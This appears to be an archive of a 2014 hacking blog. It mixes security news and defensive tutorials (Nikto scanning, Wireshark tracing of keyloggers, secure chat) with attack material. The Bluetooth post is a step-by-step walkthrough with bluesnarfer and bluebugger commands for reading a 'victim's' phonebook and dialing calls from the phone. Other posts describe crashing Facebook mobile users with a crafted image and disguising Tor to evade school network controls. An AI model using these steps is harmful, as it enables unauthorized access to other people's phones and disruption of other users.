Wednesday, August 27, 2014

Hackforums.net and .com have been hacked. DNS hacked.

It appears the most famous hacking forum online has been hacked. It appears that the DNS of the site was hacked, and the site still loads alright for some users including on mobile. This isn't the first time the forum has been hacked. In the past the site was hacked and entire databases of information stolen. It doesn't seem to be that critical this time around but time will tell.



The owner, Omniscient, said that no data was breached via Twitter with mild annoyance.

Friday, August 22, 2014

How To Test A Website Or Web Server For Vulnerabilities

Do you want to know how to run some basic tests on your web server to see if it is vulnerable? This tutorial will teach you how to penetrate your own webserver and test for vlunerabilities. This method is very traceable, so I suggest you only use it on your own web servers and with your Hosts permission.
In this tutorial you will learn how to use a simple tool to find vulnerabilities on your webserver. The tool is called Nikto and is ran on Kali Linux.
Step 1: Run Nikto on Kali Linux
We will use Kali because Nikto is preinstalled. Go to: "Kali Linux - Vulnerability Analysis - Misc Scanners - nikto" and run it.

a

Step 2:  Scan your server
To scan for vulnerabilities on a website type:
nikto -h example.com
You can use this to scan URLs as well as IP addresses. If you want to know the IP of a website just ping it.
Example:
ping example.com


Step 3:  Analyse the server vulnerabilities.
Nikto will give you a report of potential vulnerabilities on the websites server. The scan will give you a list of potential vulnerabilities a hacker could try to exploit on the webserver. Some of the vulnerabilities could be a false positive so be aware of that possibility. Some of the vulnerabilities will be have a OSVDB prefix, which stands for Open Source Vulnerability Database which is a vast database of known vulnerabilities. You can check the vulnerability IDs here: http://www.osvdb.org 

Warning: Only use this on your own server or servers you are authorized to Pen test.

 

Monday, August 18, 2014

Backtrace A Hackers Keylogger or Rat

Have you been infected with a RAT or a Keylogger and want to find out who your attacker is? Almost all Keyloggers and RATs send information to the hacker via 2 methods. In this tutorial we will explain how to find out who they are using a program called Wireshark.
There are 2 ways an attacker can receive your information. Emails and FTP servers. You must undertstand how this works first.
By Email: The hacker configures his malware and while configuring the virus server, the hack has to input which email address to send the stolen information.
By FTP server: Much like the email method, except instead of configuring an email to send your infomation to they have an FTP server that recieves your information. Usually both methods have text logs of your keystroke activity once you have been infected.
If we monitor all data packets we can scan for one of the methods and we will have the hackers FTP info or his email address.
Wireshark is a very useful and popular network scanning tool that is used by network forensic experts to monitor the incoming and outgoing packet flow of their network cards like Ethernet or WLAN. It records every packet coming and going out of your Network.
Whenever you think you may be infected, follow the steps below to find out if and who has infected you.
Step 1

1. First of all download and install Wireshark. You can find it HERE.
Note: While Wireshark installing please ensure that it installs Winpcap otherwise it won't work correctly.

2. Now go to the "Capture" button in the top menu of Wireshark and select the interface.

3. It will  capture the packets through the Network card. What you have to do is keep capturing the records for at least an hour for maximum results.

4. Now you should filter the results. Go to the filter box and type FTP and SMTP. If one doesn't work, try the other as the hacker could be using either.

5. Scroll down to find the “FTP username” and the “Password” for victims ftp account in case FTP server is used. And if hacker has used SMTP then you will also find "email address" and its "password" that the hacker used to create the malicious server that infected you.

Thats it! You have found the hacker. Note: More advanced hacker will have other methods of securing themselves. This may not always work, but is a great first step for backtracing and catching a hacker who has infected your system.

How Use Secure Encrypted Chat - Skype Alternatives

Are you still using skype to communicate for product support, or with strangers or people you barely know? If you are, stop. You are at risk because Skype is not secure. Skype is a chat protocol that allows people to grab your IP address due to the way it connects, which means you are vulnerable to Ddos attacks, and other types of attacks. They are also really easy to social engineer and steal accounts from. Stop using it, and use something more secure. In this article I will give you a few methods in which you can chat securely and with encryption.

Jabber Off The Record Secure chat:


The first program I will be showing you is Jabber and the OTR plugin for Jabber. 

How to setup jabber:

1) Download Pidgin HERE

2) Download the OTR encryption plugin for Pidgin HERE

3) Now go here HERE and create an account. Remember the credentials you use as you will need them to login to Jabber. This is essentially your username and password for the chat program. 

4) Now open up pidgin now at the tool bar at the top
Click Accounts > Manage Accounts > Add 
A box will pop up. This is where you put in your jabber information. You need to put the protocol as XMPP, the username is the one you picked when you signup on zsim.de The domain is zsim.de. The password you will get when confirming your account on zsim.de. Everything else doesn't matter.

This is how it should look.

CdjmUzt

5) Now to add the OTR plugin after you downloaded and set it up you will need to add it to pidgin to do this you will need to go to Tools > Plugins > Then click off the record messaging.


JMBlVnj



Now you can add your friends by their jabber info by going to Buddies > Add buddies then type the buddies XMPP/Jabber email.



Tox: A New Kind Of Messaging

Tox is a new alternative to Skype, and allows more than Jabber does in terms of user friendly features.

From their website:

A New Kind of Instant Messaging


With the rise of government monitoring programs, Tox provides an easy to use application that allows you to connect with friends and family without anyone else listening in. While other big-name services require you to pay for features, Tox is totally free, and comes without advertising.


About Tox



Nowadays, every government seems to be interested in what we're saying online. Tox is built on a "privacy goes first" agenda, and we make no compromises. Your safety is our top priority, and there isn't anything in the world that will change that.




  • Messages: At your fingertips.

  • You're always in the loop with instant encrypted messaging.

  • Calls: Make free and secure Tox to Tox calls.

  • Video: Catch up face to face with a secure video call.

  • Security: Tox takes your privacy seriously. With leading-class encryption, you can rest assured knowing that the only people reading your messages are the ones you send them to.



Screenshot

Picture credits: https://tox.im/

 

Tox is simple and easy to use, setup and enjoy. Compared to Skype, this is a now brainer because it can do everything Skype can do securely and you can be worry free about whether or not you will have your account stolen or someone can resolve your IP address. Visit https://tox.im/ to create an account.

 

 

 

Saturday, August 16, 2014

How To Hack Phones Bluetooth With Kali Linux And Backtrack

Do you want to learn how to hack a phone via Bluetooth using Kali Linux? The you have come to the right place. In this tutorial we will teach you how to hack any phone, whether it be Android, iPhone or Windows based phone using the power of Kali Linux aka backtrack and exploiting the Bluetooth connection of the phone itself.

 

Step 1. Install Bluesnarfer to your Linux machine using the CMD.

Open the opt directory

 

Make your way to the opt directory:
cd /opt

Download Bluesnarfer using wget
/opt# wget http://alighieri.org/tools/bluesnarfer.tar.gz

Open the directory again using the ls command and see if Bluesnarfer is there, then extract it.
:/opt# ls

bluesnarfer.tar.gz  firmware-mod-kit  metasploit  Teeth

To extract you will need to use the tar xvf command
/opt# tar xvf bluesnarfer.tar.gz

open the directory again with ls to see bluesnarfer there.
/opt# ls

BFi13-dev-18  bluesnarfer.tar.gz  metasploit

bluesnarfer   firmware-mod-kit    Teeth

Open the directory bluesnarfer created
/opt# cd bluesnarfer

/opt/bluesnarfer# ls

include  Makefile  README  src

Finish it off by compiling the install:
/opt/bluesnarfer# make

 

To see  the Bluesnarfer commands run: ./bluesnarfer
 :/opt/bluesnarfer# ./bluesnarfer

 

 

Step 2: Now that Bluesnarfer is installed, configure rfcomm.
 mkdir -p /dev/bluetooth/rfcomm

mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0

mknod --mode=666 /dev/rfcomm0 c 216 0

hciconfig -i hci0 up

hciconfig hci0

Now to scan for potential vulnerabilities:
hcitool scan hci0

Ping the victim to see if he is there:
 l2ping  < victim mac addr>

Browse the victim for rfcomm channels to connect to:
sdptool browse --tree --l2cap < mac addr >

Now Bluesnarfer is setup. Now you can access the victims phone to see texts, make phone calls etc.
Bluesnarfer -r 1-100 -C 7 -b < mac addr >

To see available commands:
bluebugger -h

To dial a number:
bluebugger -m < victim's name > -c 7 -a < mac addr > Dial < number >

This is what the Bluesnarfer shell should look like:

 

bluesnarfer, version 0.1 -

usage: bluesnarfer [options] [ATCMD] -b bt_addr

 

ATCMD     : valid AT+CMD (GSM EXTENSION)

 

TYPE      : valid phonebook type ..

example   : "DC" (dialed call list)

"SM" (SIM phonebook)

"RC" (received call list)

"XX" much more

 

-b bdaddr : bluetooth device address

-C chan   : bluetooth rfcomm channel

 

-c ATCMD  : custom action

-r N-M    : read phonebook entry N to M

-w N-M    : delete phonebook entry N to M

-f name   : search "name" in phonebook address

-s TYPE   : select phonebook memory storage

-l      : list aviable phonebook memory storage

-i      : device info

 

Friday, August 15, 2014

Adobe 0-Days found, Update Adobe Immediately.

Recently there have been 0-Day exploits found for a few select Adobe products. They have released updates to address the exploit to keep its customers safe from hackers. The programs that have been updated are:

  • Adobe Flash Player

  • Adobe AIR

  • Adobe Flash Player

  • Adobe Acrobat


The new updates were to patch exploits and various vulnerabilities that are "critical" to preform. The vulnerabilities are 0-day exploits that allow attacks to bypass sandbox protection of the Adobe products and run elevated access under windows to natively run code and remotely control slave computers infected by the 0-day.

Kaspersky Labs Global Research and Analysis Team reported CVE-2014-0546, but would not give any technical information as they are not finished with the investigation. The do confirm that the exploit has been run in some recent computers before they were made aware of this exploit. 

The specific affected versions are:

  • Adobe Flash Player 14.0.0.145 and earlier versions for Windows and Macintosh

  • Adobe Flash Player 11.2.202.394 and earlier versions for Linux

  • Adobe AIR 14.0.0.110 and earlier versions for Windows and Macintosh

  • Adobe AIR 14.0.0.137 SDK and earlier versions

  • Adobe AIR 14.0.0.137 SDK & Compiler and earlier versions

  • Adobe AIR 14.0.0.137 and earlier versions for Android


 

Source: http://helpx.adobe.com/security/products/flash-player/apsb14-17.html

Thursday, August 14, 2014

How to setup a Dynamic DNS - An Alternative to no-IP

So you need a Dynamic DNS and No-IP just doesn't cut it due to their recent legal issues? You have heard that No-IP has been compromised and need an alternative. We have an alternative for you, and in this tutorial we will show you step by step on how to set it up.

First of all, you must understand what a Dynamic DNS is. Basically it points a subdomain to your IP address to redirect anything connected to your IP address even if it changes. IP addresses will inevitably change. You also can connect to the Dynamic DNS directly instead of your IP, so you can keep your IP address to yourself. You can use this for game servers, personal networking and RDPs etc. 2

How to setup FreeDNS:

Step 1: Sign up at: http://freedns.afraid.org/signup/

Enter your details and send your activation email. Then check your email and you can proceed to step 2.



Step 2: Click on Dynamic DNS.1

It may ask you to login. Once you have logged in you will need to navigate to the "Subdomain" section of the menu as seen below.

4

 

Step 3. Fill out the form with a domain, and subdomain to go with it. This will be your Dynamic DNS.

2

 

Once you have chosen your information it should look like this:

3

Step 4. Download the wget installer HERE.

Step 5. Go back to Dynamic DNS and you will see the below page. Click on wget scripts and it will download a .bat which you will need for the next step.

5

Step 6. Run the .bat file whenever you need your Dynamic DNS and it will Sync. You should run this before doing anything requiring a DNS.

 

 

Hack Candy Crush Saga on Android

So, you want to hack Candy Crush on Android. You want to impress your friends, beat someones score and appear to be a Candy Crush God. Well, I am here to tell you how to hack Candy Crush and do all of those things.

 

First you are going to download the Android Xmod games App, as seen in the picture below and in my previous tutorial on how to hack clash of clans(Which you can find HERE ). Once you have installed the app you can find your mod for Candy Crush. The App can be downloaded in the Google Play Store HERE.

Screenshot_2014-08-14-13-16-47

Once you hit launch inside of the mod the game will start with the hack injected into the application. What the exploit does is it allows you to have unlimited lives, unlimited turns and multiply your score by up to 10 times. On level 2 I was able to get 50400 points by hardly doing anything. This is the perfect Candy Crush hack for anyone who is looking to cheat to rack up points. You can share your score on facebook to make your friends jealous of your skills, but in reality you were able to figure out a very simple exploit. You are welcome.

Screenshot_2014-08-14-13-39-56Screenshot_2014-08-14-13-19-52 Screenshot_2014-08-14-13-20-12 Screenshot_2014-08-14-13-20-41 Screenshot_2014-08-14-13-22-33

Wednesday, August 13, 2014

Bypassing School Browsing Restrictions.

Does you college limit your search abilities? Do you want to visit Netflix, Facebook, Twitter or any other website on you schools network without being blocked? Then this tutorial is for you. This is a simple tutorial on how to bypass your schools browsing restrictions.

What You Will Need

When you run Tor on your school network it will normally say it is blocked. To keep your school network from detecting it we are going to use a program to hide it by means of encryption. all school program blocks are base on a MD5 checksum. Using an encryptor will change the MD5 checksum, and enable you to use Tor on your schools network.

All you have to do is crypt the Start Tor Browser.exe to change the MD5checksum value and now it should be able to be accessed without being blocked.

If you have issues then your network probably has a http or socks proxy for Internet access, if this is the case then the proxy settings also need to be set in the tor browser.

How to crash all Facebook mobile users.

Step 1. Download: https://www.facebook.com/736151569751475
Step 2. Upload it to your timeline
Step 3. Make it your profile picture, as seen in the picture below.

Step 4. Go to your profile picture and rotate left, as seen in the picture below.


If you visit your timeline again it should be broken and no one can see it.  If you go around messaging people, liking and commenting statuses people on the mobile messaging app will start crashing.


Step 5: How to fix your profile
Go to: http://www.facebook.com/yourusername/allactivity and remove the profile image

How to torrent anonymously

Index



  • Introduction

  • Proxies

  • VPN's

  • Seedboxes


Introduction


Hello and welcome to my tutorial of how to torrent anonymously, as you may or may not know I sold an E-book with these methods for a while, and they are very successful. I am rewriting this tutorial so that you are aware of the ways you can remain safe. Firstly I want to start by saying download µTorrent I do not care for any other application, and I have used several different types. 

Proxies

You can use a proxy to make your torrent traffic anonymous as it uses a different IP address for the download and seeding, or a series of ip addressed. I highly recommend Torguard. It is a paid proxy but it uses load balancing server proxies that switch between many different countries.




 Hide your IP address on Bittorrent with an Anonymous Torrent Proxy!


  • Keep your torrent traffic 100% private from your ISP

  • Automatically configure settings on Windows, Mac, Ubuntu

  • Access 70+ Anonymous Proxy IP's in Four Different Countries

  • Enjoy Unlimited Speeds/Bandwidth on gigabit+ connections

  • Easy setup with Vuze, utorrent, bitorrent proxy walkthrough's

  • Cancel your anonymous torrent proxy anytime - no penalty!

  • Ensure your privacy with our FREE check my torrent ip tool

  • UDP Supported on all socks5 Anonymous Proxy Servers


- See more at: https://torguard.net/anonymousbittorrentproxy.php#sthash.P86fObaV.dpuf




Check VPN and Proxies for torrents to see if they work here: http://ipleak.net/


Click activate and upload your torrent, it will respond with your torrent IP address.


VPN's


A VPN or virtual private network will encrypt all of your internet traffic, including torrents. I recommend Torguard once again as your VPN, as they specialize in Torrenting privacy software. The difference between a proxy and a VPN is a proxy works with programs you configure, and a VPN encrypts your entire internet for the computer it is running on.


 

Seed Boxes

A seedbox is a server which you download and seed your torrents to and from, then you download them with ftp. For added protection use a vpn to hide your packets.

I only have one seedbox to talk about, I have used several, and this is the only one that gave me no issues. The seedbox is UnderLeech and you can get one for $16 a month. They accept Bitcoin for added security. It comes with a VPN setup so you can choose t0 download it from your secure encrypted as well.




 

Basic Setup Virtual Machine + VPN

Setup Virtual Machine + VPN

 
Have you ever wanted to use two PC's with two different IP addresses? Well now I will show you how. A VM, or Virtual machine is a virtual computer, on your own computer.

Why would you want such a thing? Well, you could use it for malware testing, double your VPN's for extra security etc.

Things we will need: 

1. VMware - http://www.softpedia.com/get/System/OS-E...tion.shtml

2. .ISO of the OS you want to install, a .iso is a virtual disk. For this tutorial I will be using Windows. 

3. OpenVPN - http://swupdate.openvpn.org/community/re...nstall.exe

4. VPN of choice, if you need one check here: http://www.anonware.net/index.php?page=vpn

Once VMware is installed, move to the instructions.

How to set up VM + VPN in VMware

1. Go to file, then new virtual machine or push CTRL+N.
2. When it asks where to install, find the .iso file. 
3. Fill out location details.
4. Chose hardware setting in the tab before the install. I suggest using only what Ram you can spare, and all of your processor power.
5. Hit install, and wait for it to install. 

Setup of OpenVPN

1.Now that VMware is installed install OpenVPN on the desktop of your VM. Make sure TAP/Tun drivers get installed or it will not work.

2. Open install directory, and drag and drop the files you got with your VPN. If you bought anything that uses OpenVPN you will see this. 

3. Then right click on the OpenVPN gui in the hidden icons of your notification bar and hit connect and you are done after entering your username and password!

 
Setup of PPTP VPN

1. Get a PPTP VPN, for practice sake, and just for browsing check out VPNbook. For more advanced security I recommend 143VPN for OpenVPN and PPTP connections.
2. Get server information.
[Image: yHJNvZ4.png]
3. Go to control panel, networking and internet options then setup new network and internet connection. 
[Image: SpimuZ5.png]
4. Connect to a workplace to set up VPN. 
[Image: RKUIidq.png]
5. Use my internet connection. 
[Image: TNreV85.png]
6. You will see this screen, add login details to it. 
[Image: FvGJ0OI.png] 
[Image: bCmN1y6.png]
7. If entered correctly it will connect, 
[Image: r5cjsfA.png]
and look like this in your network bar when finished: 
[Image: qDsifMr.png]

Tuesday, August 12, 2014

Use the Tor Anonymous Network to anonymize Skype

Before we begin, you will need:

Steps:

Navigate to https://dl.dropboxusercontent.com/u/33446/twitch/skype.html
Select the check mark that says SOCKS5 and in the host box type 127.0.0.1 and in the port box type 9050


Download the file and save it to your desktop. Now Download the Skype Firewall Blocker, ADVOR andthe fresh install of Skype if you haven't done so already. To make sure you uninstalled any previous Skype installs, use GeekUninstaller.

Extract ADVOR.


Install Skype and don't run it yet. Close it. Now run the Skype Firewall blocker.

Right click the SkypeProxySettings registry file and click merge. When asked to confirm click yes.

Reboot your PC.
After you have rebooted open the ADVOR folder and run ADVOR as an administrator. Once opened click the connect button to start the relay.

ADVOR should now be started and running.

Start Skype and login with your fresh account. It may be slow to login at first but it will finish and you will be online.


 

If Skype fails to login then please navigate to the new identity tab as seen here:


Select a new country and a new node. Just so you know the U.S. works best and is the fastes generally.

You can check your Skype is now using a new IP by navigating to http://skidresolve.com/ and entering in your Skype name.

The IP should be a TOR exit router as shown below. If it is not, please follow the steps again.




Now whenever you want to use Skype simply launch ADVOR, connect, and you are safe and secure.

 

Friday, August 1, 2014

Hack Clash of Clans on Android

Today I stumbled upon a Clash of clans cheat that is amazing. I have seen this for iOS before, however I have never seen it for Android. The Clash of Clans Android Game Assistant will allow you to do a few very awesome and helpful cheats in Clash of Clans, such as:

  • Stay always online in Clash of clans so your base cannot be raided.

  • Search for a minimum of a resource such as Gold, Elixer and Dark Elixer in a battle.

  • When searching for battles with your preset amount of resources it will automatically and quickly look for more loot if the critera has not been met.

  • Sandbox attack, fight friends and anyone else without actually fighting them! Just to see if you would win and for practice.Screenshots:

    The app itself:
    Screenshot_2014-08-01-19-57-29

    The user interface:

    [metaslider id=63]

    The app that allows you to exploit Clash of Clans is called xmodgames and can be downloaded on the Google Play store for free.
    https://play.google.com/store/apps/details?id=com.xmodgame&hl=en